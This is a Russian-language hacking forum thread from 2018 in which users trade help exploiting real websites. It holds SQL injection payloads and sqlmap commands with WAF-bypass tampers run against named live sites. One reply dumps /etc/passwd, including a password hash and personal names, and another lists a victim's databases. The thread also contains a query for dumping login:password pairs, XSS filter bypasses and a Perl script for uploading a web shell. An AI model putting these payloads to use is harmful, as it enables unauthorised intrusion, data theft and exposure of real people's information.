Лол, плайнтекстом никак?
И смысл вырезать все "опасные" символы, когда mysql_real_escape_string() наше все? Дальше этот колхоз в виде картинки разглядывать не стал.


От избытка свободного времени))) Прогнал его картинку в FineReader'e, для удобства других пользователей) Надеюсь без ошибок (разрешение картинки маловато...))


PHP:

*©copyright Copyright(c)2016,Webma ster Studio,https://www.webmaster.md
*©version 3.0 Date:2016-06-04
* @link/ws/lock.php
?>
'.$GLOBALS['ar_define_langterms']['MSG_ADMIN_WRONG_AUTH_DATA'].'';
}
else
{
$us_data=mysql_fetch_array($result);
if($us_data['block'] )
{
$_SESSION['auth_error'] =''.$GLOBALS['ar_define_langterms']['MSG_ADMIM_IS_BLOCKED'].'';
}
else
{
// запоминаем пользователя.
$login_crypt=crypt(Slogin);
$res_mem=mysql_query("UPDATE ws_users SET login_crypt='$login_crypt', 'auth_date' = NOW() WHERE login='$login'");

$_SESSION['login'] =$login;
$_SESSION['mem'] =$login_crypt;
$_SESSION['image'] =$us_data['image'];
}
}


}else{
$_SESSION['auth_error'] ='',$GLOBALS['ar_define_langterms']['MSG_ADMIN_BAD_CAPTCHA'].'';
}
}

unset($_SESSION['captcha_keystring']);

if($_SERVER['HTTP_REFERER'] )
header("Location: ".$_SERVER['HTTP_REFERER']);
else
header("Location: /ws/");
?>

Octavian
28.08.2018, 18:01
Да нормальная там кариинка!

crlf
28.08.2018, 19:43
Octavian said:
↑ (https://antichat.live/posts/4240364/)
Есть тут уязвимость?


Нет. Разве что бекслешем сломать запрос.


Gorbachev said:
↑ (https://antichat.live/posts/4240368/)
Дальше этот колхоз в виде картинки разглядывать не стал.


Держи нас в курсе.

crlf
28.08.2018, 20:33
kacergei said:
↑ (https://antichat.live/posts/4240081/)
А не подскажите как в таких ситуациях выводить БД/таблицы? А то пробовал и в hex загонять не выходит (толи руки не оттуда(( )


Оно на современных версиях кроме version() ничего не выведет, не принимает подзапросы. Нужно искать другой вектор.

Sensoft
06.09.2018, 04:48
Server side request forgery

Сканер показывает но когда начал разбираться понял что кажись ложное.

Ну я рукожоп кто что скажет по этому поводу ?


Code:
Attack details

URL encoded GET input was set to http://hitLVcyIasXkF.bxss.me/

An HTTP request was initiated for the domain hitLVcyIasXkF.bxss.me which indicates that this script is vulnerable to SSRF.

HTTP request details:
IP address: 91.204.73.53
User agent: Web Optimizer Downloader

HTTP request

GET /sites/all/modules/weboptimizer/web-optimizer/cache/wo.static.php?http://hitLVcyIasXkF.bxss.me/ HTTP/1.1
Cookie: SESSb528791853c11d9e7e82fab0a8e003d2=kvpg8nj53d8rj uceaktobpo0p2; _ym_uid=1536190447487022978; _ym_d=1536190447; _ym_isad=2; _ym_visorc_22122178=w; jv_enter_ts_vIAkaUXWoO=1536190587910; jv_visits_count_vIAkaUXWoO=1; jv_refer_vIAkaUXWoO=http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0% 2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); jv_utm_vIAkaUXWoO=; jv_pages_count_vIAkaUXWoO=4; yp=1851550627.yrtsi.1536190627; yandexuid=3741984211536190850; yabs-sid=863698391536190850; przvdom=aec9e0b96eda1de56e7eca16487d8d2ef79cce42ed 4c98f1c0c900b331344c90; przvlng=ru; przvgl=6c2147e2951f84179d9f2216c0be95adbabf6df2dea a2e03910bfa85f2369217; przvusr=e58c712e76e2839e403274f18df9c76c81e49678fb 83c2f3b64b7a13cfdc21ae; przvonline=1; przvdistance=0; jv_close_time_vIAkaUXWoO=1536191313662
Host: dominant-telecom.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Тот_самый_Щуп
06.09.2018, 05:32
Sensoft (https://antichat.live/members/266110/), а что за сканер использовался?

Sensoft
06.09.2018, 14:19
Gorbachev said:
↑ (https://antichat.live/posts/4242227/)
Sensoft (https://antichat.live/members/266110/)
, а что за сканер использовался?


акаунтикс

kacergei
10.09.2018, 12:14
Помогите подобрать вектор, никак не могу понять что фильтруется(

Почти постоянно упираюсь в ошибку: 412 Precondition Failed

Хоть какой-то другой вывод был при таких запросах:

.SpoilerTarget" type="button">Spoiler: One


Code:
URL: demo.site.net/index.php?information_id=3&route=information/information%27and(extrac-tvalue(null,con-cat(1,(select+user()))))=%271/251

Fatal error: Uncaught Exception:
Error: Unknown column 'extrac' in 'where clause'
Error No: 1054
SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information'and(extrac-tvalue(null,con-cat(1,(select user()))))='1/251' in /home/www/demo.site.net/system/database/mysqli.php:39
Stack trace:
#0 /home/www/demo.site.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array)
#1 /home/www/demo.site.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...')
#2 /home/www/demo.site.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...')
#3 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index()
#4 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action))
#5 /home/www/demo.site.net/index.php(237): Front->dispatch(Object(Action), Object(Action))
#6 {main} thrown in /home/www/demo.site.net/system/database/mysqli.php on line 39


.SpoilerTarget" type="button">Spoiler: Two


Code:
URL: demo.site.net/index.php?information_id=3&route=information/information%27and(oc_user())=%27
Fatal error: Uncaught Exception: Error: FUNCTION vilmargp_demo.oc_user does not exist
Error No: 1305
SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information'and(oc_user())='' in /home/www/demo.site.net/system/database/mysqli.php:39
Stack trace:
#0 /home/www/demo.site.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array)
#1 /home/www/demo.site.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...')
#2 /home/www/demo.site.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...')
#3 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index()
#4 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action))
#5 /home/www/demo.site.net/index.php(237): Front->dispatch(Object(Action), Object(Action))
#6 {main} thrown in /home/www/demo.site.net/system/database/mysqli.php on line 39

vilmargp_demo

Sensoft
10.09.2018, 12:32
kacergei said:
↑ (https://antichat.live/posts/4243295/)
Помогите подобрать вектор, никак не могу понять что фильтруется(
Почти постоянно упираюсь в ошибку: 412 Precondition Failed
Хоть какой-то другой вывод был при таких запросах:
Spoiler: One

Code:
URL: demo.villagedefrance.net/index.php?information_id=3&route=information/information%27and(extrac-tvalue(null,con-cat(1,(select+user()))))=%271/251

Fatal error: Uncaught Exception:
Error: Unknown column 'extrac' in 'where clause'
Error No: 1054
SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information'and(extrac-tvalue(null,con-cat(1,(select user()))))='1/251' in /home/www/demo.site.net/system/database/mysqli.php:39
Stack trace:
#0 /home/www/demo.site.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array)
#1 /home/www/demo.site.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...')
#2 /home/www/demo.site.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...')
#3 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index()
#4 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action))
#5 /home/www/demo.site.net/index.php(237): Front->dispatch(Object(Action), Object(Action))
#6 {main} thrown in /home/www/demo.site.net/system/database/mysqli.php on line 39

Spoiler: Two

Code:
URL: demo.villagedefrance.net/index.php?information_id=3&route=information/information%27and(oc_user())=%27
Fatal error: Uncaught Exception: Error: FUNCTION vilmargp_demo.oc_user does not exist
Error No: 1305
SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information'and(oc_user())='' in /home/www/demo.site.net/system/database/mysqli.php:39
Stack trace:
#0 /home/www/demo.site.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array)
#1 /home/www/demo.site.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...')
#2 /home/www/demo.site.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...')
#3 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index()
#4 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action))
#5 /home/www/demo.site.net/index.php(237): Front->dispatch(Object(Action), Object(Action))
#6 {main} thrown in /home/www/demo.site.net/system/database/mysqli.php on line 39

vilmargp_demo



Там waf стоит

Ваш запрос был отфильтрован из-за возможных проблем безопасности.

Ищи тамперы которые подойдут по другому не как

Ну или ищи гуру по sql injection, есть тут уникумы которые и руками раскрутят, там вроде waf не очень хороший стоит

joelblack
10.09.2018, 13:37
Code:
http://demo.villagedefrance.net/index.php?information_id=3&route=information/information' AND gtid_subset(user(),0) AND '1#



Code:
Fatal error: Uncaught Exception: Error: Malformed GTID set specification 'vilmargp_demo@10.123.0.65'.
Error No: 1772
SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information' AND gtid_subset(user(),0) AND '1' in /home/www/demo.villagedefrance.net/system/database/mysqli.php:39 Stack trace: #0 /home/www/demo.villagedefrance.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array) #1 /home/www/demo.villagedefrance.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...') #2 /home/www/demo.villagedefrance.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...') #3 /home/www/demo.villagedefrance.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index() #4 /home/www/demo.villagedefrance.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action)) #5 /home/www/demo.villagedefrance.net/index.php(237): Front->dispatch(Object(Action), Object(Action)) #6 {main} thrown in /home/www/demo.villagedefrance.net/system/database/mysqli.php on line 39

Тот_самый_Щуп
10.09.2018, 18:00
joelblack (https://antichat.live/members/267454/) красиво потроллил

Тот_самый_Щуп
12.09.2018, 19:30
okey said:
↑ (https://antichat.live/posts/4243922/)
Всем привет, хотел бы узнать у более профессионалов, есть ли в этом коде уязвимости? Заранее благодарен)


Да, в этом коде есть уязвимости. Можешь не благодарить.

Sensoft
19.09.2018, 15:37
Есть эксплоит на nginx 1.13.9 ?

Тот_самый_Щуп
22.09.2018, 11:59
man474019 (https://antichat.live/members/269161/):nothing to do this.

The request is then force-clipped to 14 characters. Look for SQL in other places, and there will be happiness.

Тот_самый_Щуп
22.09.2018, 15:58
man474019 said:
↑ (https://antichat.live/posts/4246285/)
thanks and how to bypass this character limit ?


At this place - no way. (this no Mysql limit) Look for another vulnerable place.

spherics
22.09.2018, 20:01
http://www.bloody.com/ru/News_txt.php?pid=263+order+by+13--&lei=22&id=5

Хорошие мышки были.

Если не сложно кому варианты накидайте уязвимости.

Sensoft
22.09.2018, 20:10
spherics said:
↑ (https://antichat.live/posts/4246372/)
http://www.bloody.com/ru/News_txt.php?pid=263+order+by+13--&lei=22&id=5
Хорошие мышки были.
Если не сложно кому варианты накидайте уязвимости.


Какие на*** варианты ?

Pirnazar
24.09.2018, 17:25
Есть ли эксплоити для Apache 2.2.22,2.4.10

panic.ker
25.09.2018, 04:39
o314um said:
↑ (https://antichat.live/posts/4246899/)
this param ($p) don't have a vuln. Only error


This garbage -> False positive. And "manЦЫФРЫ" ты нам не друг. Соратник да-но не друг, оллрайт?

panic.ker
25.09.2018, 04:40
Pirnazar said:
↑ (https://antichat.live/posts/4246786/)
Есть ли эксплоити для Apache 2.2.22,2.4.10


Sensoft перелогинься

panic.ker
25.09.2018, 04:49
Это мне опиум говорит?

Да не, я синий прост. Ну и покурил родимой немного. Ну и грибы были до. Ну и еще упоролся феном вчера. А, да, синьку я и пил, и курил, чтоб заснуть. Да только разогнало еще больше. А тут ХЛОП, и трамалгина 8 колес подьехало. Флуд не по теме, не в той теме. Хочешь узнать че-в личку дуй. Тут не будем разводить. И да-скьюлмапом прогнал и руками попробовал, у меня тоже эрроры, и вроде ни на какие операторы не реагирует.

Sensoft
25.09.2018, 11:40
panic.ker said:
↑ (https://antichat.live/posts/4246903/)
Sensoft перелогинься


Не хочу

karkajoi
27.09.2018, 21:01
Добрый вечер

как в таком запросе сделать ограничение на количество выводимых данных?


Code:
(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,login,0x3a,password))))x )

Когда большая бд, сайт ложится от попытки вывести все содержимое таблицы.

karkajoi
28.09.2018, 13:11
karkajoi said:
↑ (https://antichat.live/posts/4247765/)
Добрый вечер
как в таком запросе сделать ограничение на количество выводимых данных?

Code:
(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,login,0x3a,password))))x )

Когда большая бд, сайт ложится от попытки вывести все содержимое таблицы.




Code:
(select@ from(select@:=0x00,(select 1 from(select*from user order by userid ASC limit 0,100)w where(@:=concat(@,0x3c62723e,login,0x3a,password)) ))q)

Сам спросил , сам ответил. Збс

Может кому пригодится

DezMond™
29.09.2018, 14:43
http://crossroads-asia.de/forschung.html'

Можно что-то сделать?

DezMond™
30.09.2018, 22:49
man474019 said:
↑ (https://antichat.live/posts/4248619/)
Hi
I think it is not sql injection


естественно, т.к. такой страницы нет


Code:
WHERE (link_oldlinks.url='forschung.htmladsadsa' OR link_oldlinks.url='forschung.htmladsadsa/')

Смущает только


Code:
Table 'crossroads_asia.link_oldlinks' doesn't exist

Octavian
06.10.2018, 14:29
Что максимально можно извлечь из инекции в style="тут" разрешено '<>... без " ?


Code:
XSS

sepo
06.10.2018, 17:03
Всем привет, нашел уязвимый сайт, но вот беда, ни ручками, ни скульмапом инъекцию раскрутить не могу. Есть тут желающии помочь?


Code:
http://www.mscnano.eu/news.php?id=132

erwerr2321
06.10.2018, 17:29
sepo said:
↑ (https://antichat.live/posts/4250248/)
Всем привет, нашел уязвимый сайт, но вот беда, ни ручками, ни скульмапом инъекцию раскрутить не могу. Есть тут желающии помочь?

Code:
http://www.mscnano.eu/news.php?id=132



Например так


Code:
http://www.mscnano.eu/news.php?id=z%27%20or%20mid(version(),1,1)=5%20and %20%272%27=%272

а вообще там union based


Code:
http://www.mscnano.eu/news.php?id=z%27%20union%20select%201,2,3,@@versio n,5,6,user(),8--%20-

ну и тд


Code:
http://www.mscnano.eu/news.php?id=z%27%20union%20select%201,2,3,load_fil e(%27/etc/passwd%27),5,6,7,8--%20-


.SpoilerTarget" type="button">Spoiler: /etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13roxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:107::/var/run/dbus:/bin/false avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:104:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash speech-dispatcher:x:106:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false haldaemon:x:108:114:Hardware abstraction layer,,,:/var/run/hald:/bin/false kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:110:115ulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:111:117:RealtimeKit,,,:/proc:/bin/false saned:x:112:118::/home/saned:/bin/false hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false gdm:x:114:120:Gnome Display Manager:/var/lib/gdm:/bin/false txomin:x:1000:1000:txomin,,,:/home/txomin:/bin/bash sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin dipc:x:504:100onostia International Physics Center:/home/dipc:/bin/csh csic:x:505:100:Unidad de Fisica de Materiales:/home/csic:/bin/bash arubio:x:506:100:Angel Rubio:/home/arubio:/bin/bash ortega:x:507:100:Enrique Ortega:/home/ortega:/bin/csh ricardo:x:508:100:Ricardo Diez Muino:/home/ricardo:/bin/bash group:x:509:100:Echenique's Group:/home/group:/bin/csh seminars:x:510:100:Seminars:/home/seminars:/bin/csh papers:x:511:100apers:/home/papers:/bin/csh jgarcia:x:512:100:F. Javier Garcia de Abajo:/home/jgarcia:/bin/csh Echenique:x:513:100edro M. Echenique:/home/Echenique:/bin/csh aizpurua:x:517:517:Javier Aizpurua:/home/aizpurua:/bin/bash scsroast:x:518:100::/home/scsroast:/bin/csh inigo:x:529:100::/home/inigo:/bin/bash otzarreta:x:530:530::/home/otzarreta:/bin/bash gaudoin:x:532:532::/home/gaudoin:/bin/bash nanolab:x:533:533::/home/nanolab:/bin/bash nanotron:x:534:534::/home/nanotron:/bin/bash remi:x:535:535::/home/remi:/bin/bash digitalak:x:536:536::/home/digitalak:/bin/bash nano2006:x:537:537::/home/nano2006:/bin/bash aitzol:x:500:501:Aitzol Garcia Etxarri:/home/aitzol:/bin/bash waparpia:x:501:503:Andres Arnau:/home/waparpia:/bin/tcsh ftpdipc:x:538:538:Cuenta ftp:/home/ftpdipc:/bin/bash dedomulti:x:539:539::/home/dedomulti:/bin/bash eph2007:x:540:540::/home/eph2007:/bin/bash eltonjose:x:502:504:Elton Jose:/home/eltonjose:/bin/bash moodle:x:503:505:Usuario de moodle:/home/moodle:/bin/bash mscnano:x:523:506:Master Nanotecnologia:/home/mscnano:/bin/bash coronado:x:524:507:Alejandro Reyes Coronado:/home/coronado:/bin/bash mscnanointra:x:527:508::/home/mscnano/intranet:/bin/bash ssmeeting:x:543:509:ssmeeting:/home/ssmeeting:/bin/tcsh leskovsky:x:544:544::/home/leskovsky:/bin/bash einstein:x:545:545::/home/einstein:/bin/bash cerveny:x:514:502:Silvina Cerveny:/home/cerveny:/bin/bash schwartz:x:521:510:Gustavo Schwartz:/home/schwartz:/bin/bash frederiksen:x:526:511:Thomas Frederiksen:/home/frederiksen:/bin/bash webalianza:x:528:512::/home/webalianza:/bin/bash dipc10:x:541:513::/home/dipc10:/bin/bash eugene:x:542:514:Eugene Krasovskii:/home/eugene:/bin/bash metamorp:x:520:520::/home/metamorphose:/bin/bash spans:x:522:522::/home/spans:/bin/bash meeting:x:525:525::/home/meeting:/bin/bash Debian-exim:x:117:124::/var/spool/exim4:/bin/false mysql:x:116:123:MySQL Server,,,:/var/lib/mysql:/bin/false statd:x:118:65534::/var/lib/nfs:/bin/false nfo12:x:546:515:nfo12:/home/nfo12:/bin/bash mestizajes:x:547:516:Congreso Mestizajes:/home/mestizajes:/bin/bash ivo:x:548:519:Ivo Souza:/home/ivo:/bin/bash smmta:x:119:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:120:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false ossec:x:1001:1001::/var/ossec:/bin/false gosalvez:x:1002:1002::/home/gosalvez:/bin/bash nanophotonics:x:1003:1003:Grupo Javi Aizpurua,,,:/home/nanophotonics:/bin/bash garcialekue:x:1004:1004:Arantzazu Garcia Lekue,,,:/home/garcialekue:/bin/bash rakovich:x:1005:1005:Yury Rakovich:/home/rakovich:/bin/bash mesoscopics:x:1006:1006:Sebastian Bergeret,,,:/home/csic/mesoscopics:/bin/bash mblanco:x:1007:1007::/home/mblanco:/bin/bash QMC:$6$AuxQZxPT$aO5/vg51vWluEfCSmZGogvkptiH3SSqMqvj0SBKu0mq0gNg/Fx4ALtpV4zkn5k5Ne8HcqmEmNZNrjC3RoxTNT/:1008:1008::/home/QMC:/bin/sh iisc21:x:1009:1009:Congreso iisc21,,,:/home/iisc21:/bin/bash TJC:x:1010:1010ario Bercioux:/home/TJC:/bin/bash giedke:x:1011:1011:Geza Giedke:/home/giedke:/bin/bash maiagv:x:1012:1012:Maia Garcia Vergniory:/home/maiagv:/bin/bash trmme:x:1013:1013:Congreso Thomas Frederiksen:/home/trmme:/bin/bash internships:x:1014:1014:Responsable Thomas Frederiksen:/home/internships:/bin/bash fbarroso:x:1015:1015:Fabienne Barroso:/home/fbarroso:/bin/bash lsalassa:x:1016:1016:Luca Salassa:/home/lsalassa:/bin/bash tms17:x:1017:1017:Congreso tms17:/home/tms17:/bin/bash ecscd13:x:1018:1018:Confreso ecscd13:/home/ecscd13:/bin/bash magnon:x:1019:1019:Congreso magnon:/home/magnon:/bin/bash mole:x:1020:1020:Grupo Juanjo Saenz:/home/mole:/bin/bash nanoelectronics:x:1021:1021:Grupo Thomas Frederiksen:/home/nanoelectronics:/bin/bash nicolas:x:1022:1022::/home/dipc-courses:/bin/bash bondslam:x:1023:1023:Eduard Matito:/home/bondslam:/bin/bash colloquium:x:1024:1024:Web colloquium:/home/colloquium:/bin/bash tms:x:1025:1025:Congreso tms:/home/tms:/bin/bash qdp2018:x:1026:1026::/home/qdp2018:/bin/bash quantumdev:x:1027:1027::/home/quantumdev:/bin/bash daqm:x:1028:1028::/home/daqm:/bin/bash

ну шелл сами зальете))

lukeone
22.10.2018, 12:27
sepo said:
↑ (https://antichat.live/posts/4250248/)
Всем привет, нашел уязвимый сайт, но вот беда, ни ручками, ни скульмапом инъекцию раскрутить не могу. Есть тут желающии помочь?

Code:
http://www.mscnano.eu/news.php?id=132





Code:
python sqlmap.py -u "http://www.mscnano.eu/news.php?id=" --random-agent --hex --threads 1 --dbs --batch --dbms=mysql --technique=U --level 5 --risk 3 --tamper=space2comment,unmagicquotes,escapequotes,ve rsionedkeywords


.SpoilerTarget" type="button">Spoiler: from sqlmap
---

Parameter: id (GET)

Type: UNION query

Title: MySQL UNION query (NULL) - 8 columns

Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178627871, 0x775a5551695146647647515859656e61626e636765464348 7767764f4e56695a726557454457534a,0x71626b6271),NUL L#

---

available databases [64]:

#mysql50#mysql.old.copia

2dspm

3s19

bondslam

cc

cees

cen2018

computing_resources

daqm

dipc

dipc-courses

dipc10

dynapeutics

e2epol

eezz18

etsf

iegr

ii

inelastica

information_schema

interfaces2014

lankor_topa14

leskovsky

limage2018

magnon

modsurf

mysql

n2d

nanoqi

nanoqi16

nanoqi17

ngsces2018

oss

oss18

pecas

pecas2019

pedro

phpmyadmin

polymorphs

prueba

qdp2018

quantumchemphys

quantumdev

sabat2018

scom16

siqew2019

sos2

sos22

test

theobio17

tms17

tmspin

topadipc

topadipc2012

topadipc2014

topadipc2015

topadipc2017

topadipc2018

topadipcOLD

topostates

totalenergy2020

tstutorial

webcc

wikidb

Вся суть в том, что там стоит какой то фильтр, который сбрасывает соединения при "подозрительных запросах", тамперы в sqlmap помогают всё равно)

jakonda1001
23.10.2018, 11:46
как залиться через это

.SpoilerTarget" type="button">Spoiler

100 ? 8 : 2;

while( strlen($ff)");

fclose($hdl);

include("{$eb}.$algo");

unlink("{$eb}.$algo");

$npDcheckClassBgp = 'aue';

}

crlf
23.10.2018, 12:03
jakonda1001 said:
↑ (https://antichat.live/posts/4254530/)
как залиться через это


Он тянет, сохраняет и инклудит вот этот http://linksferma.com/lnk/inj.php скрипт. Там уже понятнее, что к чему.

TPAXXTOP
23.10.2018, 17:02
подскажите друзья есть сайт с гет параметром, добавил в конец ' вышла такая ошибка, думаю есть уязвимость

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near and status=1' at line 1

1064

но при попытке раскрутить его мапом выдает ошибку unable to connect to the target URL

пробывал прокси сунуть такая же беда

erwerr2321
23.10.2018, 17:08
@TPAXXTOP (https://antichat.live/members/291446/) мало инфы

TPAXXTOP
23.10.2018, 17:12
ms13 said:
↑ (https://antichat.live/posts/4254613/)
@TPAXXTOP (https://antichat.live/members/291446/)
мало инфы


http://prntscr.com/l9g7ob вот уязвимость на сайте выглядит так, так выдает ответ sqlmap http://prntscr.com/l9g85z

joelblack
23.10.2018, 17:17
Попробуй для начала раскрутить руками. Потом, когда на руках будет раскрученная уязвимость - используй соответствующие тамперы.

TPAXXTOP
23.10.2018, 17:19
joelblack said:
↑ (https://antichat.live/posts/4254617/)
Попробуй для начала раскрутить руками. Потом, когда на руках будет раскрученная уязвимость - используй соответствующие тамперы.


да дело в том что я не умею крутить руками) подскажи как это сделать правильно, или тыкни хоть в какой то мануал пожалуста)

erwerr2321
23.10.2018, 17:27
Обычно все советуют это (https://rdot.org/forum/showthread.php?t=124) иэто. (https://rdot.org/forum/showthread.php?t=60)

ilia455
23.10.2018, 19:28
Octavian said:
↑ (https://antichat.live/posts/4250209/)
Что максимально можно извлечь из инекции в style="тут" разрешено '<>... без " ?

Code:
XSS



css injection гугли

karkajoi
24.10.2018, 16:29
TPAXXTOP said:
↑ (https://antichat.live/posts/4254608/)
подскажите друзья есть сайт с гет параметром, добавил в конец ' вышла такая ошибка, думаю есть уязвимость
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near and status=1' at line 1
1064
но при попытке раскрутить его мапом выдает ошибку unable to connect to the target URL
пробывал прокси сунуть такая же беда


запускай тор , в мапе пропиши --tor или юзай прокси

matthhy
29.10.2018, 15:18
Просканировал сайт, там нашел вот такую ссылку - https://site.ru/engine/ajax/poll.php

.SpoilerTarget" type="button">Spoiler
https://i.imgur.com/huyqzfy.png
Что можно сделать?

c4n3k
29.10.2018, 15:38
Ребят,я почти не разбираюсь,но мап выдал http://prntscr.com/lbrh9s,но дальше тесты не дали результатов.http://prntscr.com/lbrhlm

Можно ли как-то раскрутить??

Octavian
29.10.2018, 17:07
matthhy said:
↑ (https://antichat.live/posts/4256309/)
Просканировал сайт, там нашел вот такую ссылку -
https://site.ru/engine/ajax/poll.php
Spoiler
https://i.imgur.com/huyqzfy.png
Что можно сделать?


Скинь посмотрю

matthhy
30.10.2018, 18:44
Ребят, кто может помочь.

Есть ссылка, нашел через NetSparker, она выдает ошибку. Можно ли эту ошибку как-то раскрутить.(адрес по типу https://site.su/fullnews-14

.SpoilerTarget" type="button">Spoiler
https://i.imgur.com/sX5wkoc.png

Octavian
01.11.2018, 23:45
Привет есть обходы для фильтра () " ?


Code:
XSS

BigBear
04.11.2018, 01:36
Octavian said:
↑ (https://antichat.live/posts/4257266/)
Привет есть обходы для фильтра () " ?

Code:
XSS



onerror=alert;throw 1;

This works on every browser apart from Firefox *, Safari and IE will just call the function with the argument but Chrome and Opera add uncaught to the argument. This is no big deal though since we can just modify it slightly and use a different object as an argument such as a string.

onerror=eval;throw'=alert\x281\x29';

Octavian
11.11.2018, 19:06
Есть сайт на котором разрешено бронировать места, если я создам бота который забронирует все места вызвав финансовые потери, я нарушу закон?

BigBear
13.11.2018, 06:30
Octavian said:
↑ (https://antichat.live/posts/4259596/)
Есть сайт на котором разрешено бронировать места, если я создам бота который забронирует все места вызвав финансовые потери, я нарушу закон?


Вы что-нибудь слышали об упущенной выгоде?

Muracha
14.11.2018, 12:20
Есть скрипт на perl c помощью которого я хочу залить на сайт веб шелл с подменой MIME-типа:

.SpoilerTarget" type="button">Spoiler: сплойлер


Code:
#!/usr/bin/perl
#
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'Уязвимый Сайт',
Content_Type => ' multipart/form-data; boundary="JiFT4QdEESkPzh0ybiDyKsUPi1jnCyFCgVtV4xHE"
X-Unity-Version: 5.6.5f1',
Content => [userfile => ["C:/jpeg.jpg.php", "jpeg.jpg.php", "Content-Type" =>"image/png", "iAuid" => "6cb4dbkgvato004v6i4vugq6q2","sSign" => "5msfdbv9gsct64cbo9e3hbc3p0", "content" => "" ],],);

print $res->as_string();


Но я не могу составить запрос таким образом, чтобы он принял файл. Постоянно натыкаюсь на ошибку 1000(что в скрипте значит - неправильно передан в параметре)

В самом бурпе натыкаюсь уже на 1002 - (неверный тип файла)

Подскажите, как правильно составить запрос на PERL, чтобы сайт принимал файл?

.SpoilerTarget" type="button">Spoiler: share


Code:
setConfig($oConfig);
$sShareUrl = null;
$iResult = $oSharer->doShare($sShareUrl);
if ($iResult == 1) {
print $sBaseUrl . $sShareUrl;
} else {
print $sBaseUrl . '?ec=' . $iResult;
}
} else {
error_log('Sign is incorrect => iAuid:' . $iAuid . ' sSign:' . $sSign . ' sScriptUri:' . $sScriptUri);
print $sBaseUrl . '?ec=1001'; //подпись не совпадает
}
} else {
error_log('Some parameters are not set => iAuid:' . $iAuid . ' sSign:' . $sSign . ' Image:' . ($Image ? '+' : '-'));
